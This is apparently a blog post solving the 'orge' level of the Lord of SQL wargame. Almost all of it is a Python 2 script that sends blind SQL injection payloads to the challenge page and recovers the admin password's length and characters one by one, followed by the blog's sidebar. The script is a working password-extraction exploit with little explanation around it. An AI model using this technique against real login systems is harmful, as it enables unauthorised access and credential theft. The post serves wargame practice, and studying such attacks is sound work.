LOS orge

Wargame/Lord of SQL 2018. 2. 8. 20:59

import urllib2

def request(data):
    url = "https://los.eagle-jump.org/orge_40d2b61f694f72448be9c97d1cea2480.php?pw="+urllib2.quote(data)
    req = urllib2.Request(url)
    req.add_header('User-Agent','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko')
    req.add_header('Cookie','__cfduid=d8ef4b715b1243db43a171dd9c1503f641517927129; PHPSESSID=dp23m3nrh8cfflj2iga3np4t46')
    response = urllib2.urlopen(req).read()

    if "Hello admin" in str(response):
        return True
    else:
        return False

length = 0
admin_pw = ""
strings = "1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!_@"

for i in range(0,50):
    payload = "' || id='admin' && length(pw)="+str(i)+"#"
    if request(payload)==True:
        length = i
        break

print "[*]Admin Password Length = " + str(length)


for j in range(1,length+1):
    for i in range(0,len(strings)):
        payload = "' || id='admin' && substr(pw,"+str(j)+",1) like '"+strings[i]+"%'#"
        if request(payload)==True:
            admin_pw += strings[i]
            print "[-]Admin Password = " + admin_pw
            break

print "[*]Admin Password = " + admin_pw

'Wargame > Lord of SQL' 카테고리의 다른 글

LOS vampire (0)	2018.02.08
LOS troll (0)	2018.02.08
LOS darkelf (0)	2018.02.08
LOS wolfman (0)	2018.02.08
LOS orc (0)	2018.02.08

JeonYoungSin

메모 기록용 공간

일	월	화	수	목	금	토
			1	2	3	4
5	6	7	8	9	10	11
12	13	14	15	16	17	18
19	20	21	22	23	24	25
26	27	28	29	30	31

LOS orge

'Wargame > Lord of SQL' 카테고리의 다른 글

공지사항

카테고리

태그목록

글 보관함

달력

링크

JeonYoungSin

LATEST FROM OUR BLOG

LATEST COMMENTS

BLOG VISITORS

티스토리툴바